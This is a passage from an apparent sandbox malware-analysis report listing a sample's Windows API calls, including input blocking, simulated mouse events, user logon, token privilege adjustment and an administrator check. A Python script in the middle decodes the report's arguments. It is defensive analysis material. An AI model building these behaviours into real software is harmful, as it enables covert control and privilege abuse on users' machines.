                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                          • String ID:
                                          • API String ID: 1157408455-0
                                          • Opcode ID: f8525cba7387b1cdca07263f0bbdbb5b10992e039fa414f217e8b79e657b3b08
                                          • Instruction ID: a8fad87f1c1ee40b94fe2f8a9aa3745f1e31330a640fe596c869542cb2427bf0
                                          • Opcode Fuzzy Hash: f8525cba7387b1cdca07263f0bbdbb5b10992e039fa414f217e8b79e657b3b08
                                          • Instruction Fuzzy Hash: E811EBB59013287AD7305BA59C4DFABBB7CEF44760F104596F908E7190D6744E84CBA4
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00DD12D8
                                          • GetClientRect.USER32(?,?), ref: 00E0B84B
                                          • GetCursorPos.USER32(?), ref: 00E0B855
                                          • ScreenToClient.USER32(?,?), ref: 00E0B860
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                          • String ID:
                                          • API String ID: 1010295502-0
                                          • Opcode ID: 1c55d2a9841bdc75588f02e7210863eccfab810283c7dde6edcf4c177b8008ce
                                          • Instruction ID: cc8eb283778abcf5c67a8fc5e005e622253b7549d42581ae858866d74bc79334
                                          • Opcode Fuzzy Hash: 1c55d2a9841bdc75588f02e7210863eccfab810283c7dde6edcf4c177b8008ce
                                          • Instruction Fuzzy Hash: A4112539A00119BFCB14EFA9D8869BE7BB9FB05301F100866F941E7250D731AA558BB9
                                          APIs
                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E41AFE,00000000), ref: 00E426D5
                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E4270C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Internet$AvailableDataFileQueryRead
                                          • String ID:
                                          • API String ID: 599397726-0
                                          • Opcode ID: f7e4c6f5f54e6a9c5dc031efeb08c66fbecf8b214d9e1aa4b537a7597b393286
                                          • Instruction ID: 5af4d7e563a5aa6d01248bd68d57f11e5208e13602200f961e9f89a549ba9f25
                                          • Opcode Fuzzy Hash: f7e4c6f5f54e6a9c5dc031efeb08c66fbecf8b214d9e1aa4b537a7597b393286
                                          • Instruction Fuzzy Hash: 04410571900309BFEB20DF55EC85EBBB7BCEB40328F5150AEF701B6141EA719E419664
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00E3B5AE
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E3B608
                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E3B655
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID:
                                          • API String ID: 1682464887-0
                                          • Opcode ID: ff51a9c2d36d41215e361d063c2f2548508c3f00d990c8405480ef9a96fb9886
                                          • Instruction ID: 765b070c9ab7a8ba915b7870cb44cdbeb2f1143d9872f32bab13de61b7f5c154
                                          • Opcode Fuzzy Hash: ff51a9c2d36d41215e361d063c2f2548508c3f00d990c8405480ef9a96fb9886
                                          • Instruction Fuzzy Hash: BE219275A00618EFCB00EF65D884EADFBB8FF48310F0490AAE905AB351CB31A905CB60
                                          APIs
                                            • Part of subcall function 00DF0FF6: std::exception::exception.LIBCMT ref: 00DF102C
                                            • Part of subcall function 00DF0FF6: __CxxThrowException@8.LIBCMT ref: 00DF1041
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E28D0D
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E28D3A
                                          • GetLastError.KERNEL32 ref: 00E28D47
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                          • String ID:
                                          • API String ID: 1922334811-0
                                          • Opcode ID: ff4dc92cbbb6b0db67a8f3e63f9b4a1a3a3fdc4f4bd82f6eefb13a3b18b5da25
                                          • Instruction ID: 47a9749e6184a9c5000d7db6cea2ef1ede8deb70b5d73c90df8b862c623c3e5a
                                          • Opcode Fuzzy Hash: ff4dc92cbbb6b0db67a8f3e63f9b4a1a3a3fdc4f4bd82f6eefb13a3b18b5da25
                                          • Instruction Fuzzy Hash: 25118FB1414309AFE728AF54ED86D6BB7BCEF44711B25852EF456A3681EF30AC448A70
                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E34C2C
                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E34C43
                                          • FreeSid.ADVAPI32(?), ref: 00E34C53
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                          • String ID:
                                          • API String ID: 3429775523-0
                                          • Opcode ID: 7da00b8eec6779c59db1a04ea598dd9ce066939fb2e111215aa202df3e6de059
                                          • Instruction ID: c096a8fa1fe39c733adb687d0de2f750515e04d1b71136905c55dcd644e96f81
                                          • Opcode Fuzzy Hash: 7da00b8eec6779c59db1a04ea598dd9ce066939fb2e111215aa202df3e6de059
                                          • Instruction Fuzzy Hash: 97F04F7591130CBFDF04DFF1DC89AAEBBBCEF08212F0048A9E501E2181D6706A088B50
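The API lines in these records are terse, and a few of the literal arguments they print carry the actual security meaning. In the WS2_32 record, socket(2,2,0x11) followed by bind is an IPv4 UDP listener. In the KERNEL32 record, DeviceIoControl with control code 0x4D02C is IOCTL_ATA_PASS_THROUGH (device type 4, function 0x40B, METHOD_BUFFERED, read/write access). In the ADVAPI32 record just above, AllocateAndInitializeSid(?,2,0x20,0x220,...) followed by CheckTokenMembership builds a SID with the two sub-authorities 32 and 544, which is the documented way to test whether the caller's token is a member of the local Administrators alias. The Python below is an added example, not Joe Sandbox code and not part of the analysed sample: it parses lines in this report's "• API.MODULE(args), ref: ADDR" format (the sample lines are copied from the three records named above) and decodes those arguments using the public SDK constant layouts. The identifier-authority argument is printed as "?" in the report, so the SID decoder leaves it unresolved unless the caller supplies an assumed value; 5 (SECURITY_NT_AUTHORITY) gives S-1-5-32-544.

```python
"""Parse the bullet-style API lines of a Joe Sandbox function record and decode
the arguments that carry security meaning.  Added example for this report; not
Joe Sandbox code and not part of the analysed AutoIt sample."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: lines copied verbatim from three records of this report.
SAMPLE = """\
• socket.WS2_32(00000002,00000002,00000011), ref: 00E46AB1
• bind.WS2_32(00000000,?,00000010), ref: 00E46B13
• CreateToolhelp32Snapshot.KERNEL32 ref: 00E4F151
  • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E34144
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E34C2C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E34C43
"""

# "• [Part of subcall function CALLER: ]API.MODULE[(args)], ref: ADDR"
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_@:]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]     # None where the report prints '?'
    ref: int                      # address of the call site
    subcall_of: Optional[int]     # caller address for 'Part of subcall' lines


def parse_api_lines(text: str) -> List[ApiCall]:
    """Turn report lines into ApiCall records; non-matching lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [] if raw is None else [
            None if a.strip() == "?" else int(a, 16)
            for a in raw.split(",") if a.strip()
        ]
        sub = m.group("sub")
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls


# CTL_CODE(FILE_DEVICE_CONTROLLER=4, 0x40B, METHOD_BUFFERED, FILE_READ|FILE_WRITE)
KNOWN_IOCTLS = {0x0004D02C: "IOCTL_ATA_PASS_THROUGH"}


def decode_ioctl(code: int) -> dict:
    """Split a CTL_CODE value into its winioctl.h fields."""
    return {
        "device_type": code >> 16,
        "access": (code >> 14) & 0x3,
        "function": (code >> 2) & 0xFFF,
        "method": code & 0x3,
        "name": KNOWN_IOCTLS.get(code, "unknown"),
    }


def decode_sid(args: List[Optional[int]], identifier_authority: Optional[int] = None) -> str:
    """Rebuild the SID string from AllocateAndInitializeSid arguments.
    args[0] is a pointer to the identifier authority (printed '?' in the report),
    args[1] the sub-authority count, args[2:10] the eight sub-authority slots.
    identifier_authority is an assumption supplied by the caller, not read from
    the report; 5 (SECURITY_NT_AUTHORITY) yields S-1-5-32-544, BUILTIN\\Administrators."""
    count = args[1]
    subs = args[2:2 + count]
    auth = "?" if identifier_authority is None else str(identifier_authority)
    return "S-1-" + auth + "".join(f"-{s}" for s in subs)


AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTO = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


def decode_socket(args: List[Optional[int]]) -> tuple:
    """Map socket(af, type, protocol) literals to their winsock2.h names."""
    return tuple(table.get(v, str(v)) for table, v in zip((AF, SOCK, PROTO), args))


def annotate(calls: List[ApiCall]) -> List[str]:
    """One human-readable note per call whose literal arguments can be decoded."""
    notes = []
    for c in calls:
        if c.api == "socket" and len(c.args) == 3:
            notes.append(f"{c.api}: " + "/".join(decode_socket(c.args)))
        elif c.api == "DeviceIoControl" and len(c.args) > 1 and c.args[1] is not None:
            d = decode_ioctl(c.args[1])
            notes.append(f"{c.api}: 0x{c.args[1]:X} = {d['name']} "
                         f"(type {d['device_type']}, fn 0x{d['function']:X})")
        elif c.api == "AllocateAndInitializeSid":
            notes.append(f"{c.api}: {decode_sid(c.args)}")
    return notes


if __name__ == "__main__":
    for note in annotate(parse_api_lines(SAMPLE)):
        print(note)
```

The regex deliberately accepts the three line shapes that occur in these records: calls with an argument list, calls printed without one (CreateToolhelp32Snapshot), and the indented "Part of subcall function" entries, whose caller address is kept in subcall_of so call chains can be rebuilt across records.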
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          • GetParent.USER32(?), ref: 00E0BA0A
                                          • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00DD19B3,?,?,?,00000006,?), ref: 00E0BA84
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00E3C966
                                          • FindClose.KERNEL32(00000000), ref: 00E3C996
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00E0BB8A,?,?,?), ref: 00E5C8E1
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00E5C8C7
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 00E5CC51
                                          • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00E0BC66,?,?,?,?,?), ref: 00E5CC7A
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E4977D,?,00E5FB84,?), ref: 00E3A302
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E4977D,?,00E5FB84,?), ref: 00E3A314
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EC), ref: 00E5CD74
                                          • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,00E0BBE5,?,?,?,?), ref: 00E5CDA2
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E28851), ref: 00E28728
                                          • CloseHandle.KERNEL32(?,?,00E28851), ref: 00E2873A
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,00E64178,00DF8F97,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 00DFA39A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00DFA3A3
                                          APIs
                                          • __time64.LIBCMT ref: 00E38B25
                                            • Part of subcall function 00DF543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E391F8,00000000,?,?,?,?,00E393A9,00000000,?), ref: 00DF5443
                                            • Part of subcall function 00DF543A: __aulldiv.LIBCMT ref: 00DF5463
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 00E5DB46
                                          APIs
                                            • Part of subcall function 00DD25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DD25EC
                                          • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,00E0BBA2,?,?,?,?,00000000,?), ref: 00E5D740
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                            • Part of subcall function 00DD2344: GetCursorPos.USER32(?), ref: 00DD2357
                                            • Part of subcall function 00DD2344: ScreenToClient.USER32(00E967B0,?), ref: 00DD2374
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000001), ref: 00DD2399
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000002), ref: 00DD23A7
                                          • NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,00E0BC4F,?,?,?,?,?,00000001,?), ref: 00E5C272
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AsyncState$ClientCursorDialogLongNtdllProc_ScreenWindow
                                          • String ID:
                                          • API String ID: 2356834413-0
                                          • Opcode ID: 8a899fbc5f55733ddbb9518084b4803c52da5a01f8d00752253d28d02d72c36a
                                          • Instruction ID: f52bb633d95df8d48241f959f676465186e2f00fd4b861d83b343ea391cb9687
                                          • Opcode Fuzzy Hash: 8a899fbc5f55733ddbb9518084b4803c52da5a01f8d00752253d28d02d72c36a
                                          • Instruction Fuzzy Hash: FCF0E234204228AFCF04AF49CC16EBA3BA1EB14751F000416F9466B2A1CB71A864DBF0
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00DD1B04,?,?,?,?,?), ref: 00DD18E2
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogLongNtdllProc_Window
                                          • String ID:
                                          • API String ID: 2065330234-0
                                          • Opcode ID: 652bdbf670ecdb8c0e53b47562249122859971e87802667061e0e69e0470c3a9
                                          • Instruction ID: 8f1e0c154c22c01ccee0861f91929e4393dcd6163a1e86d7e58696c0ac4dcc8d
                                          • Opcode Fuzzy Hash: 652bdbf670ecdb8c0e53b47562249122859971e87802667061e0e69e0470c3a9
                                          • Instruction Fuzzy Hash: DBF05E34600215AFDB18DF56D86197637A2FB54350F10452BF9525B3A1DB31DC60EB60
                                          APIs
                                          • BlockInput.USER32(00000001), ref: 00E44218
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          • API String ID: 3456056419-0
                                          • Opcode ID: 88195c5d8c46b2e2807f303a8a4dc349607691210a00bd4a5b4dd9ae616f89cd
                                          • Instruction ID: a86f100620c62d6b37b247772ca541b4a102e818704834ee3736972347186db0
                                          • Opcode Fuzzy Hash: 88195c5d8c46b2e2807f303a8a4dc349607691210a00bd4a5b4dd9ae616f89cd
                                          • Instruction Fuzzy Hash: EAE012712502145FC710AF59E454A9AF7D8EF54761F009416F849D7361DAB1A8408BA0
                                          APIs
                                          • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 00E5CBEE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: DialogNtdllProc_
                                          • String ID:
                                          • API String ID: 3239928679-0
                                          • Opcode ID: 3df143d8332f68f3188a3e5937baa40240d35d0c56f3a38417817f9a2a77cd92
                                          • Instruction ID: 7aadddccee80906d653210ca5ac735b941ab9e46696e55f28478111fd60457d4
                                          • Opcode Fuzzy Hash: 3df143d8332f68f3188a3e5937baa40240d35d0c56f3a38417817f9a2a77cd92
                                          • Instruction Fuzzy Hash: 5FF06D31240394AFDB21DF58DC05FC63BA5EB09760F14485AFA11372E1CB707824D7A0
                                          APIs
                                          • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E34F18
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          • Opcode ID: 14c59d20426498a34a21a262939d7b4c9d2402a51702e4c0850a0ac89f957374
                                          • Instruction ID: 904d43a65adf1fea26bf3bfe8d5b2200bc91c57bf28dcc611ccb04e915848555
                                          • Opcode Fuzzy Hash: 14c59d20426498a34a21a262939d7b4c9d2402a51702e4c0850a0ac89f957374
                                          • Instruction Fuzzy Hash: A5D09EF43646057DFC194B21AC1FFB71909E340796F9C79C97201B94C1A8E57C54E035
                                          APIs
                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E288D1), ref: 00E28CB3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
